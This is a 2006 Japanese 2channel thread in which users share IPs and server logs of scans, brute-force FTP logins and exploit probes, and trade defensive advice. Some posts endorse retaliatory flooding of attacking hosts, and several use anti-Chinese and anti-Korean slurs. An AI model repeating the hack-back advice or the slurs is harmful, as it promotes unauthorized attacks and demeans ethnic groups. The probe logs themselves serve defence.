アホーは元気だな IPアドレス 221.24.143.27 ホスト名 softbank221024143027.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 xDSL
908 :
名無しさん@お腹いっぱい。 :2006/04/23(日) 20:06:21
IPアドレス 61.156.42.103 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし PG2(中韓香ブロック)入れてあるのに・・・
909 :
名無しさん@お腹いっぱい。 :2006/04/24(月) 00:05:51
61.12.172.122 122.172.12.61.ap.gmo-access.jp
,rn \从从从从从从从从从从/ r「l l h. ≫人類の太陽金正日大将軍が | 、. !j / / ≫民族の翼ノドンに乗って ゝ .f / _ ≫華麗に910getニダ!!! | | ,r'⌒ ⌒ヽ、. ≫ウリは神なり!!!! ,」 L_ f ,,r' ̄ ̄ヾ. ヽ. / ./ ≫ゴミども頭が高いニダ!!!! ヾー‐' | ゞ‐=H:=‐fー)r、) ./ /WWWWWWWWWW\ | じ、 ゙iー'・・ー' i.トソ \ \. l、 r==i ,; |' \ ノリ^ー->==__,..-‐ヘ__. / /| / \ ノ ハヽ |_/oヽ__/ /\ / |_ ゴゴゴゴ… \ / / / \./ / ヽ___ \' |o O ,| \ ../ / / y' | |\/ | ./ / | |o |/| _ | ./__/ | | | 「 \:"::/ ヾニコ[□]ニニニ | ⌒ リ川::/ / \ / \ ...::::/ / ゞ___ \/ / / / \. \ / / ゝ / .::\ / | | / ....:::::::::/\< | / | / ...::::::::::/ | | / / ....:::::::/ | .| / ...::::::::/ | | / .....::::::/ |___| / /''' .... ...:::::::::/ ( \__ / ...:::::::::/ ゙-'`ー---'
911 :
名無しさん@お腹いっぱい。 :2006/04/25(火) 17:37:36
検索結果 IPアドレス 206.223.151.67 ホスト名 tiger509.maido3.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
ぐぐればすぐに分かりそうなもんなんだがなあ>911
59.34.196.88 うざ
915 :
名無しさん@お腹いっぱい。 :2006/04/30(日) 04:19:33
211.123.234.206 これも
210.173.169.161 www3.asahi.com ←しつこい
すいませんセキュリティ初心者質問スレが荒れてるのでここで質問 させてください。 自分のIPアドレス変えるにはどうしたらよろしいのでしょうか? Bフレッツ光に加入してるのですが、フレッツ接続ツールをアンインスコ してまたインスコし直せばよいのでしょうか? それともリカバリでクリーンインスコすればよろしいのでしょうか?
切断して二日ぐらい放置してから再接続したら?
自分の使用プロバイダのスレ行け
IPアドレス 218.225.14.211 ホスト名 cr211.ade.point.ne.jp ↑うざいんです。
58.51.164.100 219.148.175.167 218.57.168.203 60.176.103.57 218.57.94.241 59.56.103.119 222.243.156.234 222.183.17.18 222.241.79.122 222.241.101.226 60.161.193.249 211.101.61.32 218.77.87.251 58.208.1.160 222.85.31.57 222.81.145.82 58.212.103.56 きょうはお客さんが多いんだが。
IANAがUDP5353にしつこいのはなぜ?内部の共有やってないのに
925 :
名無しさん@お腹いっぱい。 :2006/05/02(火) 03:51:46
IPアドレス 222.2.191.220 ホスト名 ZG191220.ppp.dion.ne.jp 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 光 こいつは、本当にしつこい。
vsftpd: Unknown Entries: authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=222.147.156.209 : 297 Time(s) check pass; user unknown: 297 Time(s) うぉっほ、久しぶりにがんがってる奴が来た Name: p12209-ipadfx01niho.hiroshima.ocn.ne.jp Address: 222.147.156.209
なんつのかな。2chが某宗教団体にのっとられてることは衆知なわけで、 それでもこのスレがあるってことは… 相も変らぬ嫌韓中育てな。参考にはさせてもらう。
?誤爆?
意味不明
,rn \从从从从从从从从从从/ r「l l h. ≫人類の太陽金正日大将軍が | 、. !j / / ≫民族の翼ノドンに乗って ゝ .f / _ ≫華麗に930getニダ!!! | | ,r'⌒ ⌒ヽ、. ≫ウリは神なり!!!! ,」 L_ f ,,r' ̄ ̄ヾ. ヽ. / ./ ≫ゴミども頭が高いニダ!!!! ヾー‐' | ゞ‐=H:=‐fー)r、) ./ /WWWWWWWWWW\ | じ、 ゙iー'・・ー' i.トソ \ \. l、 r==i ,; |' \ ノリ^ー->==__,..-‐ヘ__. / /| / \ ノ ハヽ |_/oヽ__/ /\ / |_ ゴゴゴゴ… \ / / / \./ / ヽ___ \' |o O ,| \ ../ / / y' | |\/ | ./ / | |o |/| _ | ./__/ | | | 「 \:"::/ ヾニコ[□]ニニニ | ⌒ リ川::/ / \ / \ ...::::/ / ゞ___ \/ / / / \. \ / / ゝ / .::\ / | | / ....:::::::::/\< | / | / ...::::::::::/ | | / / ....:::::::/ | .| / ...::::::::/ | | / .....::::::/ |___| / /''' .... ...:::::::::/ ( \__ / ...:::::::::/ ゙-'`ー---'
931 :
名無しさん@お腹いっぱい。 :2006/05/02(火) 23:35:44
61.180.228.245 黄砂と同じで毎日くるよ。 氏ねよシナチク
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 218.227.0.0/16 b. [ネットワーク名] BIGLOBE-5 f. [組織名] BIGLOBEサービス(日本電気株式会社) g. [Organization] NEC Corporation m. [管理者連絡窓口] NK032JP n. [技術連絡担当者] MK11728JP p. [ネームサーバ] ns02.mesh.ad.jp p. [ネームサーバ] ns03.mesh.ad.jp [割当年月日] 2002/02/20 [最終更新] 2004/04/12 17:47:01(JST) 上位情報 ---------- 日本電気株式会社 (NEC Corporation) [割り振り] 218.227.0.0/16 下位情報 ---------- 該当するデータがありません。 なんか知らんけどリモートアクセスしてくる。
218.227.145.20
217.126.16.209 ←どうやらstaticらしい My鯖(Linux)のProFTPDに向かってAdministratorで 先月26日に2時間総当たりかけてきた。
936 :
名無しさん@お腹いっぱい。 :2006/05/04(木) 01:31:01
[2006-05-03 01:12:45] 219.159.68.194 [2006-05-03 02:37:44] 61.136.223.176 [2006-05-03 13:11:09] 61.134.60.18 [2006-05-03 16:27:00] 61.185.198.180 [2006-05-03 16:32:12] 72.17.143.251 [2006-05-03 17:24:55] 202.104.236.52 [2006-05-03 19:13:36] 61.175.163.195 [2006-05-03 23:23:04] 61.175.163.195
937 :
名無しさん@お腹いっぱい。 :2006/05/04(木) 18:03:59
IPアドレス 219.26.60.32 ホスト名 softbank219026060032.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 xDSL ズレータ・・・。
938 :
名無しさん@お腹いっぱい。 :2006/05/04(木) 18:20:18
58.94.102.122 - - [04/May/2006:15:06:39 +0900] "GET / HTTP/1.0" 200 2857 "-" "Yamada-Search/0.21 (Windows NT/5.1; Build 2600; Service Pack 1)" 俺はLinuxだって。
Apr 29 18:22:02 localhost xinetd[442]: START: telnet pid=1326 from=221.241.89.93 Apr 29 18:22:02 localhost xinetd[442]: START: telnet pid=1327 from=221.241.89.93 Apr 30 16:16:08 localhost xinetd[442]: START: telnet pid=9393 from=221.241.89.93 Apr 30 16:16:08 localhost xinetd[442]: START: telnet pid=9394 from=221.241.89.93 May 4 00:00:06 localhost xinetd[442]: START: telnet pid=11269 from=221.241.89.93 May 4 00:00:06 localhost xinetd[442]: START: telnet pid=11270 from=221.241.89.93 May 4 05:37:19 localhost xinetd[442]: START: telnet pid=836 from=221.241.89.93 May 4 05:37:19 localhost xinetd[442]: START: telnet pid=837 from=221.241.89.93 ポートスキャナ? 毎回認証前で閉じてる。 会社:FTTH@USEN
941 :
名無しさん@お腹いっぱい。 :2006/05/04(木) 21:03:29
うちの掲示板に異なる人から 書き込みがあるのですが、自演くさいのです。 この3つは同じ人でしょうか・・・ 初心者ですみません。 p8024-ipad14aobadori.miyagi.ocn.ne.jp p5241-ipad10aobadori.miyagi.ocn.ne.jp p8155-ipad13aobadori.miyagi.ocn.ne.jp
942 :
名無しさん@お腹いっぱい。 :2006/05/04(木) 21:32:46
ネカフェ
943 :
名無しさん@お腹いっぱい。 :2006/05/04(木) 22:40:48
すいませんセキュリティ初心者質問スレが荒れてるのでここで質問 させてください。 自分のIPアドレス変えるにはどうしたらよろしいのでしょうか? Bフレッツ光に加入してるのですが、フレッツ接続ツールをアンインスコ してまたインスコし直せばよいのでしょうか? それともリカバリでクリーンインスコすればよろしいのでしょうか?
あぼーん
946 :
名無しさん@お腹いっぱい。 :2006/05/05(金) 03:14:24
210.20.66.9:25863
947 :
名無しさん@お腹いっぱい。 :2006/05/05(金) 13:12:51
IPアドレス 220.213.199.82 ホスト名 kctv84082.ccnw.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 0568 接続回線 CATV
IP: 202.219.237.76 ntgifu092076.gifu.nt.adsl.ppp.infoweb.ne.jp
IPアドレス 203.133.141.101 ホスト名 pc129101.ztv.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 和歌山県 市外局番 -- 接続回線 CATV
,rn \从从从从从从从从从从/ r「l l h. ≫人類の太陽金正日大将軍が | 、. !j / / ≫民族の翼ノドンに乗って ゝ .f / _ ≫華麗に950getニダ!!! | | ,r'⌒ ⌒ヽ、. ≫ウリは神なり!!!! ,」 L_ f ,,r' ̄ ̄ヾ. ヽ. / ./ ≫ゴミども頭が高いニダ!!!! ヾー‐' | ゞ‐=H:=‐fー)r、) ./ /WWWWWWWWWW\ | じ、 ゙iー'・・ー' i.トソ \ \. l、 r==i ,; |' \ ノリ^ー->==__,..-‐ヘ__. / /| / \ ノ ハヽ |_/oヽ__/ /\ / |_ ゴゴゴゴ… \ / / / \./ / ヽ___ \' |o O ,| \ ../ / / y' | |\/ | ./ / | |o |/| _ | ./__/ | | | 「 \:"::/ ヾニコ[□]ニニニ | ⌒ リ川::/ / \ / \ ...::::/ / ゞ___ \/ / / / \. \ / / ゝ / .::\ / | | / ....:::::::::/\< | / | / ...::::::::::/ | | / / ....:::::::/ | .| / ...::::::::/ | | / .....::::::/ |___| / /''' .... ...:::::::::/ ( \__ / ...:::::::::/ ゙-'`ー---'
221.241.120.7 - - [04/May/2006:21:17:14 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [04/May/2006:21:30:56 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [04/May/2006:21:37:28 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [04/May/2006:22:23:40 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:05:28:33 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:08:19:28 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:13:51:56 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:16:22:20 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:18:05:00 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:18:35:45 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:18:53:57 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:20:21:36 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:21:52:15 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [05/May/2006:23:26:04 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [06/May/2006:03:09:02 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [06/May/2006:03:15:35 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" 221.241.120.7 - - [06/May/2006:07:21:07 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-" しつこい。現時点でReply有り
>>951 May 5 01:37:45 localhost xinetd[442]: START: telnet pid=1427 from=221.241.120.7
May 5 01:37:45 localhost xinetd[442]: START: telnet pid=1428 from=221.241.120.7
May 5 02:58:02 localhost xinetd[442]: START: telnet pid=1461 from=221.241.120.7
May 5 02:58:02 localhost xinetd[442]: START: telnet pid=1462 from=221.241.120.7
May 5 03:14:00 localhost xinetd[442]: START: telnet pid=1477 from=221.241.120.7
May 5 03:14:01 localhost xinetd[442]: START: telnet pid=1478 from=221.241.120.7
May 5 15:59:08 localhost xinetd[442]: START: telnet pid=1955 from=221.241.120.7
May 5 15:59:08 localhost xinetd[442]: START: telnet pid=1956 from=221.241.120.7
May 5 23:07:11 localhost xinetd[442]: START: telnet pid=2182 from=221.241.120.7
May 5 23:07:11 localhost xinetd[442]: START: telnet pid=2183 from=221.241.120.7
Apacheだけじゃなかった・・・
>>949 残念でした1つズレてしまいましたね。さすが大将軍。
954 :
名無しさん@お腹いっぱい。 :2006/05/07(日) 06:53:08
222.122.199.8 211.154.222.56 61.186.252.158 60.190.232.32
955 :
名無しさん@お腹いっぱい。 :2006/05/07(日) 17:38:49
すいませんこのIPの情報わかりませんか? IP:203.180.88.45 です よろしくお願いいたします。
Domain Information: [ドメイン情報] a. [ドメイン名] MESH.AD.JP e. [そしきめい] にっぽんでんきかぶしきがいしゃ f. [組織名] 日本電気株式会社 g. [Organization] NEC Corporation k. [組織種別] JPNIC会員ネットワーク l. [Organization Type] JPNIC Member's Network m. [登録担当者] NK032JP n. [技術連絡担当者] SK4819JP p. [ネームサーバ] ns02.mesh.ad.jp p. [ネームサーバ] ns03.mesh.ad.jp [状態] Connected (2006/12/31) [登録年月日] 1994/12/12 [接続年月日] 1995/01/30 [最終更新] 2006/01/01 01:16:12 (JST) 一回リモホ強制表示の板でこいつを注意したら 毎日のように来るorz
958 :
名無しさん@お腹いっぱい。 :2006/05/07(日) 18:44:24
>>955 残念ながらそのIP情報からは何もわかりません。
959 :
名無しさん@お腹いっぱい。 :2006/05/07(日) 19:00:36
Whoisの[最終更新]ってIPが変わった日のことですか?
960 :
名無しさん@お腹いっぱい。 :2006/05/07(日) 19:10:16
whoisじゃないですか。まぁとにかく 956>に[最終更新]ってるじゃないですか、何が更新されているのですか? Ipが変化したのですか?
>>960 最終更新]ってるじゃないですか最終更新]ってるじゃないですか最終更新]ってるじゃないですか
203.131.198.199からPCの電源入れるたびにアクセスがあります。 なんでだろ?
blog.t.livedoor.jpに聞けよ、つか、おまいのブログとかだったりしない?w
>>963 ブログなんて滅相もない。
livedoorに聞いたほうがよさげだね。サンクス
965 :
名無しさん@お腹いっぱい。 :2006/05/08(月) 17:45:20
IPアドレス 220.104.3.196 ホスト名 p3196-ipbf05souka.saitama.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光 IPアドレス 220.104.57.151 ホスト名 p3151-ipad03hiraide.tochigi.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 栃木県 市外局番 -- 接続回線 xDSL で、どうした?
さいたまー
967 :
名無しさん@お腹いっぱい。 :2006/05/09(火) 16:35:41
IPアドレス 220.96.156.40 ホスト名 p2040-ipbf01funabasi.chiba.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 光 光体操の効果がデてきましたよ。
968 :
962 :2006/05/09(火) 20:16:39
livedoorblogに問い合わせたらパッタリとアクセスが無くなった。 電源入れるだけで1日に20〜30回はセキュリティ警告があったのに。 しかも問い合わせの返信メールが来ない… 何か変。 でも、無事解決。
218.229.60.136
>>971 よかったな、でもなんか気持ち悪いな
とりあえずなんかのサイト見てライブドア系だったらこまめにキャッシュ消して
クッキーは残さない、いや受け入れないことだな
>>970 サンクス。
クッキーやキャッシュの件、了解しました。
137.189.97.18
某国からポート8080にアクセスされてる
リクエストは"GET
http://www.google.com/intl/zh-CN/ HTTP/1.0" 応答404
8080を選んで開けたのは意図的だけど、実験鯖でproxy機能なんか無いっつの
実害無くても腹立つから、いっそのこと404の替わりに、
天安門や法輪功みたいな検閲対象語句を含めた某国政府批判ページで応答してやろうか…?
それいいな。ぜひ作ったら公開してくれ。
975 :
名無しさん@お腹いっぱい。 :2006/05/11(木) 12:09:30
d3015d9a.tcat.ne.jp 211.1.93.154:33134 昨日からのアクセスが100回以上 いい加減にしろ
239.255.255.250 うざすぎ
>>976 ルータのUPnPを止めればいいだろ薄ら馬鹿
>>977 ほんとだ、気付かずに
1時間ぐらい火壁と格闘してたよ、アホだな俺。
ありがとw
979 :
名無しさん@お腹いっぱい。 :2006/05/12(金) 14:59:59
206.223.150.96
206.223.149.90 banana340.maido3.com 米国から
43.244.161.218 の紹介のSPAMが日に50通くらい来てウザイ。 アドレス同じなのに毎回URL違う。 GMO Internet(interQの運営元)のサービスを使ってる。
218.216.234.205
c-65-96-239-168.hsd1.ma.comcast.net UNKNOWN nobody [10/May/2006:11:37:50 +0900] "USER Administrator" 331 - c-65-96-239-168.hsd1.ma.comcast.net UNKNOWN nobody [10/May/2006:11:37:50 +0900] "PASS (hidden)" 530 - 15分間で約1800回FTPログイン試行してきた。 だから、AdministratorなんてIDねぇって。
>986 そういうのって大抵は踏み台だろ。sshも多いよ。 たまにアクセスしてきたプロトコルでflooding攻撃してあげてるけど持ち主は気づいてくれるかな? IDで文章を書いてる。
>>987 な〜る。
IDで文書。。いいねそれw
こんどお返ししてあげよう。
989 :
973 :2006/05/16(火) 14:38:22
>>987-988 持ち主は気付かないと思うよw
ってか、気付くようなら最初から踏み台にされたりしないんじゃね?
お前さん方が攻撃者にならなくてもいいでしょ
開けっ放しのポート8080には、米国からIPやリクエスト内容を変えながら数回のアクセス。
顔文字が入ってるリクエスト"GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1"は何かのメッセージか?w
発信元IPは以下。これらも踏み台なのかもしれないけど…
69.15.194.46
61.150.109.73
61.129.117.101
今日
216.129.98.137 - - [16/May/2006:06:11:18 +0900] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:18 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:19 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:19 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:19 +0900] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:20 +0900] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:20 +0900] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:20 +0900] "GET /ads/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:21 +0900] "GET /xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:21 +0900] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:22 +0900] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:22 +0900] "GET /blog/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:22 +0900] "GET /drupal/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:23 +0900] "GET /community/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
あと、同じIPで二日おきに
61.129.113.230 - - [16/May/2006:19:24:32 +0900] "GET
http://lookfreebies.com/prx1.php HTTP/1.0" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
なんですかこれ?
991 :
:2006/05/17(水) 00:26:40
>>990 後半の"GET
http:// 〜"は、誰かのIEのproxy設定に入れられてるのでしょう
404を返してるから、実際に踏み台になったのかどうかは分からないです
IEのproxy設定に自鯖のIPとポートを入れて、どこか外部のページを見に行ってみて、
自鯖がproxyとして動かないことを確認しておくのがよいかと
用もないのにGET
http:// 〜はプロクシチェッカだな。
>>990 の場合prx1.phpが存在すると200が返るからわかり辛い。
>>993 の通りプロクシになってないか確認しておくのが良いかと。
TCP SYN FLOOD ベスト3 40回:207.68.178.16 32回:65.54.195.185 24回:207.68.178.239
996 :
990 :2006/05/18(木) 02:14:07
>>993 >>994 サンクス
squidは動かしてないけど、念のため串テストやってみた。
とりあえずプロキシとしては動いてないっぽいです。
Apacheが串に化けてたら手に負えないw
無駄に8080空けてトップにゴミページ載せようかな・・・
>>996 Apacheはバーチャルホスト設定にして、その一番最初をダミーホストにするだよ。
そうすればIPアドレスでアクセスしてくるそやつらは全部そこ行き。
二番目以降で中身のあるホストを設定するだす。
「バーチャルホスト ダミー」で検索してみりん。
192.168.0.19
>>9 ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \ / \ / \ / \ / \
支那蓄がウザイとです。 もうね氏ねと――
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。